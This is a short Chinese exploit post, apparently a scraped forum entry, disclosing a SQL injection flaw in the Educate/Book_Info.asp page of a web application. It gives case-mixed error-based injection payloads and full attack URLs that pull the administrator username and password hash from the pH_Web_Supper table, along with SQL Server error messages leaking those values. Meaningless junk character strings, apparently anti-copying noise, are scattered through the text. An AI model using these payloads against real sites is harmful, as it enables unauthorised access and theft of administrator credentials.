漏洞出现在Educate/Book_Info.asp
# c9 p5 Q# M$ [# N9 G " w8 O& L$ ~4 [" b( Y
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
' s, o9 ^' s; `( V) d 3 V0 E- b# Q, q8 Y
exp:如下; J& X) o5 ]" P
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)7 s% p6 U q- d% }; H
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)9 J" E, ?2 B, }1 w/ D+ i/ M
7 O/ x: x0 X1 k, ?& U& Shttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
9 @! e8 h# z- v) B. o & O, U1 r" d' F! y* U. v4 ~% @
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'3 z# [5 q! O4 W/ ]9 O( t3 X: v
( I$ r1 O5 i+ I& B( C7 f, x将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
?. c+ {* G" E
$ R" a# X& k! }/ u/Educate/Book_Info.asp,行 8
3 d; q7 W+ [+ W E" x5 Q' I0 r8 t& ~ * K. Q5 Y1 F' C: h) R, {3 A9 ~
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)7 p2 a1 D( l0 G0 S. Y% y
- N* T! E$ n& _Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
, q. V( b: M, i- A+ m, S$ \- n
; v" ~7 [3 v$ J" \2 Q. Q" q: u将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。4 X6 c8 U ?+ r$ X: a7 H+ o' K2 t# B
( X7 ?' r+ c9 c( o3 V/Educate/Book_Info.asp,行 8. H% H% c$ n3 z& n, \- `
|